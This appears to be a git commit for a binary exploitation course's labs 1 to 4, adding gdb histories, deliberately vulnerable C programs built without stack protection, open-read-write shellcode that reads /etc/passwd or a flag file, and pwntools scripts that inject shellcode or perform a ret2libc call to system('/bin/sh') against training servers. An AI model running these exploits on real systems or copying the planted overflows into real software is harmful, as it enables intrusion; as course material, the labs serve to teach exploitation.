add lab1-lab4

This commit is contained in:
angelboy 2016-11-28 20:03:13 +08:00
parent 2f4ff1a22b
commit f548ba54d0
19 changed files with 890 additions and 0 deletions

256
LAB/lab1/.gdb_history Normal file

@ -0,0 +1,256 @@
disas main
b *0x08048799
r
info registers
pdisas main
info registers
xinfo
xinfo register
context
x/wx 0xffffd640
si
ni
q
q
disas main
disas get_flag
b *0x080486ee
r
ni
x/wx
x/wx 0xffffd5b8
c
q
disas get_flag
b *0x080486ee
r
ni
x/w 0xffffd5b8
c
q
bcall read
r
ni
x/wx 0xffffd5b8
c
clear
q
disas get_flag
b *0x08048720
r
set $edx=$eax
info registers
c
q
disas main
info functions
q
disas main
disas get_flag
b *0x080486ee
r
ni
x/d 0xffffd5b8
c
q
ãr
b *0x080486ee
r
ni
x/d 0xffffd5b8
x/u 0xffffd5b8
r
c
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
bu'
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ãc
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
q
r
x/d 0xffffd5b8
x/x 0xffffd5b8
x/p 0xffffd5b8
x/u 0xffffd5b8
x/o 0xffffd5b8
r
disas main
disas get_flag
b *0x080486ee
r
x/x 0xffffd5b8
c
x/x 0xffffd5b8
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
q
r
x/x $esp
info $esp
info esp
info registers esp
q
disas main
disas get_flag
b *0x080486ee
r
ni
p/u 0xffffd5b8
p/u *0xffffd5b8
c
r
ni
p/u *0xffffd5b8
x/d 0xffffd5b8
c
q
bcall read
r
ni
p/u *0xffffd5b8
x/d 0xffffd5b8
ni
got
q

BIN
LAB/lab1/sysmagic Executable file

Binary file not shown.

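--- a/LAB/lab1/sysmagic.c
+++ b/LAB/lab1/sysmagic.c
@@ -0,0 +1,28 @@
+#include <stdio.h>
+#include <unistd.h>
+void get_flag(){
+int fd ;
+int password;
+int magic ;
+char key[] = "Do_you_know_why_my_teammate_Orange_is_so_angry???";
+char cipher[] = {7, 59, 25, 2, 11, 16, 61, 30, 9, 8, 18, 45, 40, 89, 10, 0, 30, 22, 0, 4, 85, 22, 8, 31, 7, 1, 9, 0, 126, 28, 62, 10, 30, 11, 107, 4, 66, 60, 44, 91, 49, 85, 2, 30, 33, 16, 76, 30, 66};
+fd = open("/dev/urandom",0);
+read(fd,&password,4);
+printf("Give me maigc :");
+scanf("%d",&magic);
+if(password == magic){
+for(int i = 0 ; i < sizeof(cipher) ; i++){
+printf("%c",cipher[i]^key[i]);
+}
+}
+}
+int main(){
+setvbuf(stdout,0,2,0);
+get_flag();
+return 0 ;
+}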
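Review bot: `open()` in `fd = open("/dev/urandom",0);` is used without `#include <fcntl.h>`, so it is implicitly declared, and neither its result nor that of `read()` is checked; if the open fails, `password` is never written and `if(password == magic)` compares an indeterminate value. Add the include and guard the read, e.g. `if (fd < 0 || read(fd, &password, sizeof password) != sizeof password) return;`, and `close(fd)` once the value has been read. The loop index `int i` is also compared against `sizeof(cipher)`, a `size_t`, which trips `-Wsign-compare`; declaring it `size_t i` avoids that.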

75
LAB/lab2/.gdb_history Normal file

@ -0,0 +1,75 @@
dias main
disas main
q
disas main
b *0x0804858a
r
si
q
disas main
b *0x0804858a
at
c
si
ni
si
ni
q
disas main
diaas _start
info functions
b *0x08048060
r
si
ni
ni
q
disas mian
disas main
b *0x08048559
r
si
ni
b *0x80484fd
r
c
q
b *0x80484fd
c
r
ni
x/30wx 0xffffd5b0
x/30wx 0xffffd5c4
q
disas main
q
disas main
b *0x80484fd
r
si
si
si
q
q
q
at
disas main
b *0x0804858a
c
si
si
x/s 0x80490c8
x/30gx 0x804a065
x/30wx 0x804a065
x/30wx 0x804a060
x/30wx 0x804a060
q
q
q
q
q
q
b _start
r
ni
q

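--- a/LAB/lab2/Makefile
+++ b/LAB/lab2/Makefile
@@ -0,0 +1,2 @@
+orw:orw.c
+gcc -z execstack -m32 orw.c -o orw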

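--- a/LAB/lab2/orw.asm
+++ b/LAB/lab2/orw.asm
@@ -0,0 +1,30 @@
+section .text
+global _start
+_start
+jmp file
+open :
+pop ebx
+xor eax,eax
+mov al,5
+xor ecx,ecx
+int 0x80
+mov ebx,eax
+mov al,3
+mov ecx,esp
+mov dl,0x30
+int 0x80
+mov al,4
+mov bl,1
+mov dl,0x30
+int 0x80
+xor eax,eax
+inc eax
+int 0x80
+file :
+call open
+db '/etc/passwd',0x0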
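Review bot: `_start` on the third line has no colon, which NASM accepts only with the warning "label alone on a line without a colon might be in error"; the other labels are written `open :` and `file :`, so `_start:` keeps the file consistent and silent. A one-line header comment naming what the file is (the lab2 open/read/write sample assembled into orw.bin) would also help, since the file currently has no comments at all.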

BIN
LAB/lab2/orw.bin Executable file

Binary file not shown.

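--- a/LAB/lab2/orw.py
+++ b/LAB/lab2/orw.py
@@ -0,0 +1,12 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "training.pwnable.tw"
+port = "11002"
+r = remote(host,port)
+r.recvuntil(":")
+sc = "\xeb\x20\x5b\x31\xc0\xb0\x05\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe1\xb2\x30\xcd\x80\xb0\x04\xb3\x01\xb2\x30\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xdb\xff\xff\xff/home/orw/flag\x00"
+r.sendline(sc)
+r.interactive()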

256
LAB/lab3/.gdb_history Normal file

@ -0,0 +1,256 @@
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
q
b *main
r
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
q
r
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextdown
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
q
q
r
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
q
contextdown
q
b main
r
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
q

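--- a/LAB/lab3/Makefile
+++ b/LAB/lab3/Makefile
@@ -0,0 +1,2 @@
+ret2sc:ret2sc.c
+gcc -m32 -fno-stack-protector -z execstack ret2sc.c -o ret2sc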

BIN
LAB/lab3/ret2sc Executable file

Binary file not shown.

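--- a/LAB/lab3/ret2sc.c
+++ b/LAB/lab3/ret2sc.c
@@ -0,0 +1,13 @@
+#include <stdio.h>
+char name[50];
+int main(){
+setvbuf(stdout,0,2,0);
+printf("Name:");
+read(0,name,50);
+char buf[20];
+printf("Try your best:");
+gets(buf);
+return ;
+}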
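Review bot: `return ;` in `int main()` returns no value from a non-void function, so the process exit status is unspecified; it should be `return 0;`. `read()` is also called without `#include <unistd.h>`, relying on an implicit declaration that C99 and later reject, and the 50 bytes read into `name` are never NUL-terminated, so `name` is not a C string if anything ever prints it. `gets()` is not declared by `<stdio.h>` in the C11 default modes of recent gcc/glibc, so the build in the Makefile (which sets no `-std=`) may warn or, with newer compilers, fail.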

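--- a/LAB/lab3/ret2sc.py
+++ b/LAB/lab3/ret2sc.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "10.211.55.28"
+port = 8888
+r = remote(host,port)
+name = 0x804a060
+r.recvuntil(":")
+r.sendline(asm(shellcraft.sh()))
+r.recvuntil(":")
+payload = "a"*32
+payload += p32(name)
+r.sendline(payload)
+r.interactive()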

135
LAB/lab4/.gdb_history Normal file

@ -0,0 +1,135 @@
disas main
q
r
off puts
off system
q
disas main
b *0x0000000000400814
r
q
r
vmmmap
vmmap
x/30gx 0x0804a000
x/30wx 0x0804a000
q
r
off puts
q
r
got
at
got
x/wx 0x804a01cc
x/wx 0x804a01c
x/i 0xf7591ca0
off puts
at
vmmap
libc
off system
r
q
r
abcd 32
c
length 32 P
find sh
find /binsh
find /bin/sh
off 0xf7f6f82b
libc
x/x 0xf7f6f82b-0xf7e14000
q
r
vmmap
r
x/x 0x804a060
x/x 0x804a080
q
patten
patten_create
cyclic
pattern_create
pattern_create 100
r
q
r
r
ni
b read
r
ni
q
r
ni
b read
r
ni
q
r
b read
c
ni
r
ni
q
r
b read
r
ni
q
r
b read
r
ni
q
r
q
r
q
q
r
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
q

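--- a/LAB/lab4/Makefile
+++ b/LAB/lab4/Makefile
@@ -0,0 +1,2 @@
+ret2lib:ret2lib.c
+gcc -fno-stack-protector -mpreferred-stack-boundary=2 -m32 ret2lib.c -o ret2lib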

BIN
LAB/lab4/ret2lib Executable file

Binary file not shown.

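--- a/LAB/lab4/ret2lib.c
+++ b/LAB/lab4/ret2lib.c
@@ -0,0 +1,34 @@
+#include <stdio.h>
+void See_something(unsigned int addr){
+int *address ;
+address = (int *)addr ;
+printf("The content of the address : %p\n",*address);
+};
+void Print_message(char *mesg){
+char buf[48];
+strcpy(buf,mesg);
+printf("Your message is : %s",buf);
+}
+int main(){
+char address[10] ;
+char message[256];
+unsigned int addr ;
+puts("###############################");
+puts("Do you know return to library ?");
+puts("###############################");
+puts("What do you want to see in memory?");
+printf("Give me an address (in dec) :");
+fflush(stdout);
+read(0,address,10);
+addr = strtol(address);
+See_something(addr) ;
+printf("Leave some message for me :");
+fflush(stdout);
+read(0,message,256);
+Print_message(message);
+puts("Thanks you ~");
+return 0 ;
+}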
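Review bot: `addr = strtol(address);` passes one argument to a function that takes three (`const char *, char **, int`); because `<stdlib.h>` is not included the call is implicitly declared, so it compiles but the missing `endptr` and `base` are read from whatever happens to be on the stack, which is undefined behaviour. Include `<stdlib.h>` and write `addr = strtol(address, NULL, 10);`; the 10 bytes `read()` into `address` are also never NUL-terminated, so `strtol` can scan past the buffer — read `sizeof address - 1` bytes and terminate at the returned length. `printf("...%p\n",*address)` passes an `int` where `%p` expects a `void *` (use `%x`, or cast), `<string.h>` and `<unistd.h>` are missing for `strcpy`/`read`, and the `};` closing `See_something` is a stray empty declaration.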

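--- a/LAB/lab4/ret2lib.py
+++ b/LAB/lab4/ret2lib.py
@@ -0,0 +1,27 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+from pwn import *
+host = "training.pwnable.tw"
+port = 11004
+r = remote(host,port)
+r.recvuntil(":")
+puts_got = 0x0804a01c
+r.sendline(str(puts_got))
+r.recvuntil(": ")
+puts_adr = int(r.recvuntil("\n").strip(),16)
+puts_off = 0x5f140
+libc = puts_adr - puts_off
+print "libc : ",hex(libc)
+system = libc + 0x3a940
+sh = 0x804929e
+r.recvuntil(":")
+payload = "a"*60
+payload += p32(system)
+payload += "bbbb"
+payload += p32(sh)
+r.sendline(payload)
+r.interactive()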


@ -1,5 +1,6 @@
#!/bin/bash
#
cd $HOME
sudo apt-get -y update
sudo apt-get -y upgrade
sudo apt-get -y install binutils nasm